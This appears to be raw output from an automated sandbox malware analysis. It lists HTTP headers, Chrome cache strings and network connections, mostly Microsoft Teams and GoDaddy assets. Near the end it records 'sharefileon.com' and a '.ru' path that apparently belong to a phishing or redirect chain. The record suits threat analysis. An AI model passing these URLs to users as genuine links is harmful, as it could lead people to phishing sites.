Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.47.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-8f288caX-Version: 8f288caX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 17 Dec 2024 17:20:45 GMTConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:21:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tziHdpkoCEKt0CsF%2Fbc7FyWGB3Dhu%2BGtFT66JCs6RQiZuUOtkxC7NMgrnXIBYw2XsD9sCGpos0sfwtv67XKF3LwU6C6rXPjxOcH8EfcGVdNIQlJ4X%2Bvnmvc913WAuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3738&min_rtt=3292&rtt_var=1553&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2248&delivery_rate=865127&cwnd=251&unsent_bytes=0&cid=6a4841361699a886&ts=415&x=0"CF-Cache-Status: HITAge: 6675Server: cloudflareCF-RAY: 8f38966e0c4a4398-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2472&min_rtt=2466&rtt_var=937&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1899&delivery_rate=1159650&cwnd=230&unsent_bytes=0&cid=0e7cb3f65a06fb5f&ts=9335&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:21:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: nqEQSUWgJ+ln/AD+Ou54LzwAsDkMWL0TZsU=$CUmV7KiADNjvCRR3cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f3896868bdb8c17-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:21:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: camdjefsWBnIVO3mIeQ6uodtj+Vxo0VFiYA=$6p1qtzV2ZHFyiitccache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f3896afff9e0fa0-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:21:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: THv3vofDioSIlwD1jXaRl3C0bhTX4MVrkxk=$UHhag6/aaUWWbcQtcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f3896cbee09de94-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_656.1.dr, chromecache_699.1.drString found in binary or memory: http://jedwatson.github.io/classnames
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: http://scripts.sil.org/OFL
Source: chromecache_369.1.dr, chromecache_494.1.drString found in binary or memory: http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).
Source: chromecache_471.1.dr, chromecache_672.1.drString found in binary or memory: https://aka.ms/mcpgaps
Source: chromecache_431.1.dr, chromecache_687.1.drString found in binary or memory: https://aka.ms/producerlearnmore
Source: chromecache_431.1.dr, chromecache_687.1.drString found in binary or memory: https://aka.ms/teamshost/?liveevent=true&tenantId=
Source: chromecache_431.1.dr, chromecache_687.1.drString found in binary or memory: https://aka.ms/teamsliveauditorium
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://github.com/andrew-paglinawan/QuicksandFamily)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk40eiNxw.woff2)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk50eiNxw.woff2)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hJFQNcOM.woff2)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hJVQNcOM.woff2)
Source: chromecache_669.1.dr, chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2)
Source: chromecache_549.1.drString found in binary or memory: https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-4f9b682.png
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-osx/24295.615.3297.8324/MicrosoftTeams.pkg
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MSTeams-arm64.
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MicrosoftTeams
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msix
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MicrosoftTeams-x
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MSTeams-x86.msix
Source: chromecache_525.1.drString found in binary or memory: https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MicrosoftTeams-x
Source: chromecache_519.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/118046-b79764f5406c6892.js.map
Source: chromecache_585.1.dr, chromecache_512.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/119068-f15e591f2b30bed1.js.map
Source: chromecache_574.1.dr, chromecache_645.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/120951-1965c2e12a30acee.js.map
Source: chromecache_576.1.dr, chromecache_343.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/13290-6ce7944222d53848.js.map
Source: chromecache_484.1.dr, chromecache_666.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/137137-a4fd7f1e961d35fc.js.map
Source: chromecache_460.1.dr, chromecache_398.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/169233-94071e9ab8bbe183.js.map
Source: chromecache_540.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/169767-cde234dc0bbb0b5b.js.map
Source: chromecache_347.1.dr, chromecache_544.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/183153-1c9db25c40ee158a.js.map
Source: chromecache_491.1.dr, chromecache_372.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/192699-192c894d6acbddef.js.map
Source: chromecache_559.1.dr, chromecache_614.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/193021-f13c2dcfbe345db4.js.map
Source: chromecache_344.1.dr, chromecache_480.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/19528-b6fec175b219cd79.js.map
Source: chromecache_400.1.dr, chromecache_686.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/196395-04975d44a0a148a8.js.map
Source: chromecache_412.1.dr, chromecache_493.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/204348-6c2a726c296c1d1e.js.map
Source: chromecache_415.1.dr, chromecache_709.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/209929-95fdc8ec21fd6b75.js.map
Source: chromecache_712.1.dr, chromecache_392.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/221963-5e2af34f8bc6a49a.js.map
Source: chromecache_393.1.dr, chromecache_505.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/224109-b008f1b0861e9cd6.js.map
Source: chromecache_717.1.dr, chromecache_469.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/224316-24c285ed94067094.js.map
Source: chromecache_498.1.dr, chromecache_476.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/22826-319fcd504b4f79a4.js.map
Source: chromecache_477.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/232042-5e4b6be533bec974.js.map
Source: chromecache_437.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/2333-afd67534d2d2fc7e.js.map
Source: chromecache_583.1.dr, chromecache_492.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/233940-74cf9f018d3d63e1.js.map
Source: chromecache_522.1.dr, chromecache_502.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/268910-19dd9f09325e420a.js.map
Source: chromecache_370.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/273198-072882987da06b97.js.map
Source: chromecache_455.1.dr, chromecache_552.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/2754-d1fd7c89df97899f.js.map
Source: chromecache_466.1.dr, chromecache_700.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/299770-19f9009717d80418.js.map
Source: chromecache_718.1.dr, chromecache_702.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/309556-e5af156e58ebe618.js.map
Source: chromecache_391.1.dr, chromecache_545.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/320494-30cfac786d71789c.js.map
Source: chromecache_602.1.dr, chromecache_590.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/336776-ea71e5cdee4549c4.js.map
Source: chromecache_348.1.dr, chromecache_557.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/337355-53949d9632bb831d.js.map
Source: chromecache_389.1.dr, chromecache_649.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/34655-d47d0d947ba2b72d.js.map
Source: chromecache_386.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/364713-3b9c2490aac0a041.js.map
Source: chromecache_384.1.dr, chromecache_577.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/365138-e937838d72d8903a.js.map
Source: chromecache_675.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/367927-44fa44710376bb7a.js.map
Source: chromecache_631.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/378200-5bdb80e2ca6adf70.js.map
Source: chromecache_582.1.dr, chromecache_570.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/381452-be282a834691e600.js.map
Source: chromecache_385.1.dr, chromecache_445.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/387552-d458b7b8f456ca9b.js.map
Source: chromecache_354.1.dr, chromecache_653.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/396573-d8961d04657e3b46.js.map
Source: chromecache_515.1.dr, chromecache_673.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/400532-77cf1bd2c9b72a9f.js.map
Source: chromecache_483.1.dr, chromecache_682.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/412417-b3da2627a5108e3b.js.map
Source: chromecache_594.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/416397-1c547cab2265aa75.js.map
Source: chromecache_595.1.dr, chromecache_526.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/417548-aa8c7d7584ee7aca.js.map
Source: chromecache_591.1.dr, chromecache_490.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/420340-fadd8cd32aedf874.js.map
Source: chromecache_407.1.dr, chromecache_473.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/421318-8ae476c777a9a79b.js.map
Source: chromecache_416.1.dr, chromecache_521.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/425104-7f05ec4bfb91b2a4.js.map
Source: chromecache_395.1.dr, chromecache_665.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/428348-eca109e63880cadf.js.map
Source: chromecache_356.1.dr, chromecache_689.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/443192-5c28040beb13153d.js.map
Source: chromecache_625.1.dr, chromecache_616.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/453394-e3907e3486cba0fd.js.map
Source: chromecache_394.1.dr, chromecache_381.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/459872-6142424fcf6e95ed.js.map
Source: chromecache_546.1.dr, chromecache_479.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/471294-5c6c36c6a7d801e5.js.map
Source: chromecache_703.1.dr, chromecache_581.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/47330-e2a167f3c69f0c2c.js.map
Source: chromecache_467.1.dr, chromecache_663.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/478644-057a172734e2511c.js.map
Source: chromecache_419.1.dr, chromecache_426.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/492696-90f4127f742d63a7.js.map
Source: chromecache_659.1.dr, chromecache_371.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/49749-fa07bf3bd120c3c7.js.map
Source: chromecache_432.1.dr, chromecache_647.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/499319-ba112383185f5946.js.map
Source: chromecache_671.1.dr, chromecache_679.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/502994-560a49b271bc8e93.js.map
Source: chromecache_685.1.dr, chromecache_630.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/505772-1af27dc373b0b4e5.js.map
Source: chromecache_698.1.dr, chromecache_359.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/509664-7bd4baf7c60bad9d.js.map
Source: chromecache_538.1.dr, chromecache_537.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/52085-aa1e2134d5b41b9f.js.map
Source: chromecache_619.1.dr, chromecache_542.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/52196-c82deace0372cca0.js.map
Source: chromecache_688.1.dr, chromecache_567.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/526413-c28bdad77203758d.js.map
Source: chromecache_429.1.dr, chromecache_500.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/534940-f1c535e0c8723100.js.map
Source: chromecache_446.1.dr, chromecache_670.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/574626-81646a4463eeafd6.js.map
Source: chromecache_539.1.dr, chromecache_421.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/57627-ce7087dcecb2b6d1.js.map
Source: chromecache_422.1.dr, chromecache_503.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/602438-e94806bc95e51c6b.js.map
Source: chromecache_504.1.dr, chromecache_501.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/616161-320ea2e58c4a17c9.js.map
Source: chromecache_615.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/618332-82f3e580c26e4cde.js.map
Source: chromecache_506.1.dr, chromecache_363.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/61875-11d8be0fadbe338b.js.map
Source: chromecache_598.1.dr, chromecache_450.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/638637-20856706a13e593e.js.map
Source: chromecache_564.1.dr, chromecache_530.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/653800-bb36137dc0ad9a94.js.map
Source: chromecache_424.1.dr, chromecache_346.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/657660-4776a55841f4d594.js.map
Source: chromecache_694.1.dr, chromecache_468.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/662908-71da5000e4ef5f3f.js.map
Source: chromecache_716.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/668172-b0568f91988739cd.js.map
Source: chromecache_448.1.dr, chromecache_593.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/669152-07edb61a22aacff3.js.map
Source: chromecache_693.1.dr, chromecache_378.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/674958-37b4889b0bcb5464.js.map
Source: chromecache_375.1.dr, chromecache_405.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/675783-0d429e991ff3f034.js.map
Source: chromecache_655.1.dr, chromecache_661.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/690936-9e6744bf3934da2e.js.map
Source: chromecache_355.1.dr, chromecache_680.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/693-bce9adbf9f09ae94.js.map
Source: chromecache_414.1.dr, chromecache_489.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/698386-08e4f521fff06ec5.js.map
Source: chromecache_369.1.dr, chromecache_494.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/699899-331504c4218b8be3.js.map
Source: chromecache_516.1.dr, chromecache_345.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/704334-4685fd55d90d2109.js.map
Source: chromecache_388.1.dr, chromecache_587.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/710639-d32f6e097a5709e2.js.map
Source: chromecache_597.1.dr, chromecache_711.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/711005-dcc14d48e317723d.js.map
Source: chromecache_423.1.dr, chromecache_351.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/712315-4d70afe314e618ce.js.map
Source: chromecache_481.1.dr, chromecache_697.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.map
Source: chromecache_436.1.dr, chromecache_417.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/725591-f9265ef9f2d4e54e.js.map
Source: chromecache_575.1.dr, chromecache_611.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/725973-6805c0080a1be3a7.js.map
Source: chromecache_349.1.dr, chromecache_569.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/747607-e867fd4c0b2c8d0f.js.map
Source: chromecache_366.1.dr, chromecache_579.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/750818-47183b62e0fe13ec.js.map
Source: chromecache_610.1.dr, chromecache_508.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/7747-899d03cb39279d83.js.map
Source: chromecache_514.1.dr, chromecache_360.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/78219-00e9beea3d8f803a.js.map
Source: chromecache_636.1.dr, chromecache_704.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/786989-55e0f9d38c65dac3.js.map
Source: chromecache_527.1.dr, chromecache_684.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/795307-6e8551d9d7dca952.js.map
Source: chromecache_541.1.dr, chromecache_543.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/802756-ff6932200fc249b5.js.map
Source: chromecache_438.1.dr, chromecache_361.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/816373-105b523bdd46a179.js.map
Source: chromecache_558.1.dr, chromecache_362.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/816410-26421d0c40cd02ca.js.map
Source: chromecache_523.1.dr, chromecache_420.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/829271-5bfd7ab6aba19f68.js.map
Source: chromecache_482.1.dr, chromecache_397.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/834680-ec074dfe4008b640.js.map
Source: chromecache_650.1.dr, chromecache_451.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/839569-5ad0493aad697642.js.map
Source: chromecache_690.1.dr, chromecache_646.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/856736-96dae80631262ffc.js.map
Source: chromecache_439.1.dr, chromecache_692.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/865969-b2c9db756cacf6bd.js.map
Source: chromecache_608.1.dr, chromecache_633.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/876152-9b16060b7960d27c.js.map
Source: chromecache_497.1.dr, chromecache_547.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/900516-ca863ef1d4e5aa90.js.map
Source: chromecache_534.1.dr, chromecache_485.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/914945-cba296ef334bdcfb.js.map
Source: chromecache_470.1.dr, chromecache_524.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/917004-31390847bfb97c52.js.map
Source: chromecache_623.1.dr, chromecache_444.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/918681-ba768de32ce52fb9.js.map
Source: chromecache_425.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/924039-ece960d105d7bb44.js.map
Source: chromecache_586.1.dr, chromecache_580.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/927767-5e852cded1999922.js.map
Source: chromecache_603.1.dr, chromecache_710.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/931067-540363234a7874ae.js.map
Source: chromecache_486.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/941359-9026e0bb33bc2d9d.js.map
Source: chromecache_408.1.dr, chromecache_440.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/94139-a0e97f9184666b52.js.map
Source: chromecache_532.1.dr, chromecache_667.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/945208-20d36298097b5d53.js.map
Source: chromecache_410.1.dr, chromecache_409.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/945920-3a6d5656b464115b.js.map
Source: chromecache_342.1.dr, chromecache_404.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/950449-d8aed37fd787097c.js.map
Source: chromecache_617.1.dr, chromecache_695.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/965787-5b58e72ef92ce381.js.map
Source: chromecache_353.1.dr, chromecache_509.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/96611-20373bce5580a2d1.js.map
Source: chromecache_357.1.dr, chromecache_401.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/972276-16a6accc1de1eb6a.js.map
Source: chromecache_382.1.dr, chromecache_433.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/981462-f51da5697f0fb680.js.map
Source: chromecache_668.1.dr, chromecache_461.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/981746-a3168603d4db6f8f.js.map
Source: chromecache_441.1.dr, chromecache_642.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/985157-23a375d8f9446453.js.map
Source: chromecache_495.1.dr, chromecache_474.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/986559-4ca7a71999c4c275.js.map
Source: chromecache_639.1.dr, chromecache_664.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/990521-e9325ffc81da8165.js.map
Source: chromecache_550.1.dr, chromecache_641.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/990536-9cffaef74a52be40.js.map
Source: chromecache_599.1.dr, chromecache_528.1.dr, chromecache_454.1.dr, chromecache_413.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/async-entry-8a5088adbb16698b.js.map
Source: chromecache_390.1.dr, chromecache_696.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/calendar-locale-en-us-f89bbb2143811669.js.ma
Source: chromecache_478.1.dr, chromecache_565.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/calling-locale-en-us-314542ee1dfe6bf0.js.map
Source: chromecache_431.1.dr, chromecache_687.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/config-prod-7274dc51e5177220.js.map
Source: chromecache_707.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/core-essentials-8a2700f43401ea74.js.map
Source: chromecache_453.1.dr, chromecache_487.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.map
Source: chromecache_683.1.dr, chromecache_456.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.map
Source: chromecache_676.1.dr, chromecache_657.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/global-auth-db63683c3dceeec4.js.map
Source: chromecache_428.1.dr, chromecache_600.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/libphonenumber-bundle-d6c9245b72d57bc2.js.ma
Source: chromecache_705.1.dr, chromecache_475.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/main-77fbafbde8768a32.js.map
Source: chromecache_674.1.dr, chromecache_592.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/main-locale-en-us-82dc95ddf9f2139f.js.map
Source: chromecache_471.1.dr, chromecache_672.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/meeting-collaboration-locale-en-us-d9e2dc9f4
Source: chromecache_513.1.dr, chromecache_518.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/msal-service-9932e6430c9a9d87.js.map
Source: chromecache_465.1.dr, chromecache_376.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/premium-benefits-locale-en-us-48b16b68f7171e
Source: chromecache_626.1.dr, chromecache_640.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/recurrence-locale-en-us-651b2b023666e1f6.js.
Source: chromecache_628.1.dr, chromecache_638.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/services-calling-service-adapters-cd2e0d2e14
Source: chromecache_701.1.dr, chromecache_578.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/services-people-4b57d8ffa3d30125.js.map
Source: chromecache_411.1.dr, chromecache_406.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/services-sharepoint-client-e22e01c4ca3d9d51.
Source: chromecache_634.1.dr, chromecache_435.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/services-sharepoint-share-0450343a421a4d79.j
Source: chromecache_613.1.dr, chromecache_452.1.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/teams-and-channels-locale-en-us-f503fa26e616
Source: chromecache_549.1.drString found in binary or memory: https://sharefileon.com/
Source: chromecache_669.1.drString found in binary or memory: https://sharefileon.com/404
Source: chromecache_549.1.drString found in binary or memory: https://vexino.mactans.ru/21EzuOJ/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
